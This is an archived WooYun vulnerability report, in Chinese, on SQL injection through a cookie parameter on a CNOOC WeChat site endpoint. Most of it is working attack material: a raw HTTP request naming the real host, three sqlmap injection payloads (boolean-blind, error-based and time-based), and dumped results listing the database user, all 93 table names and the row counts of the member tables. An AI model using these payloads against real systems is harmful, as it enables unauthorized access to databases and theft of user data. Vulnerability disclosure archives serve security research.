乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-30: 细节已通知厂商并且等待厂商处理中 2015-07-05: 厂商已经主动忽略漏洞,细节向公众公开
sql注射
GET /mobile/lib/api.php HTTP/1.1Cookie: BOKADOTCNSITEENGINE=*X-Requested-With: XMLHttpRequestReferer: http://weixin.cnooc.com.cn/Host: weixin.cnooc.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*
---Parameter: Cookie #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: BOKADOTCNSITEENGINE=' RLIKE (SELECT (CASE WHEN (7907=7907) THEN 0x424f4b41444f54434e53495445454e47494e453d ELSE 0x28 END)) AND 'oflE'='oflE Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: BOKADOTCNSITEENGINE=' AND (SELECT 3414 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(3414=3414,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MdHT'='MdHT Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: BOKADOTCNSITEENGINE=' OR SLEEP(5) AND 'gbCK'='gbCK---web application technology: PHP 5.4.35, Apache 2.4.12back-end DBMS: MySQL 5.0current user: 'qiyeplus@localhost'available databases [2]:[*] information_schema[*] qiyeplusDatabase: qiyeplus[93 tables]+----------------------+| boka_account || boka_address || boka_agency || boka_agencyproduct || boka_award || boka_card || boka_channel || boka_comments || boka_count || boka_credits || boka_creditsettings || boka_deliver || boka_department || boka_devices || boka_dict || boka_digs || boka_failedlogins || boka_fans || boka_favorites || boka_follow || boka_form || boka_formanswer || boka_formitem || boka_formresult || boka_forum || boka_friends || boka_groups || boka_hongbao || boka_infodict || boka_keywords || boka_kfaccount || boka_kfservices || boka_knowledge || boka_knowledgeclass || boka_logins || boka_logs || boka_meeting || boka_meetinginfo || boka_members || boka_message || boka_modreason || boka_mpgroups || boka_mpmenu || boka_mpmenu_20150615 || boka_mpmsg || boka_navi || boka_news || boka_newsclass || boka_newscontent || boka_openid || boka_operator || boka_orderlist || boka_orderrecord || boka_orders || boka_pages || boka_permission || boka_polls || boka_posts || boka_probation || boka_product || boka_productclass || boka_pushit || boka_qrcode || boka_qymsg || boka_rank || boka_rebate || boka_recommend || boka_recommendclass || boka_record || boka_search || boka_security || boka_sense || boka_senseclass || boka_sessions || boka_settings || boka_shakearound || boka_share || boka_shareview || boka_shops || boka_sign || boka_sorts || boka_sponsor || boka_supplierproduct || boka_tasks || boka_timeline || boka_tplmessage || boka_tracks || boka_userdict || boka_usergroup || boka_views || boka_website || boka_websiteclass || boka_words |+----------------------++----------------------+---------+| Table | Entries |+----------------------+---------+| boka_credits | 39768 || boka_members | 36301 |
修复
危害等级:无影响厂商忽略
忽略时间:2015-07-05 14:36
漏洞Rank:4 (WooYun评价)
暂无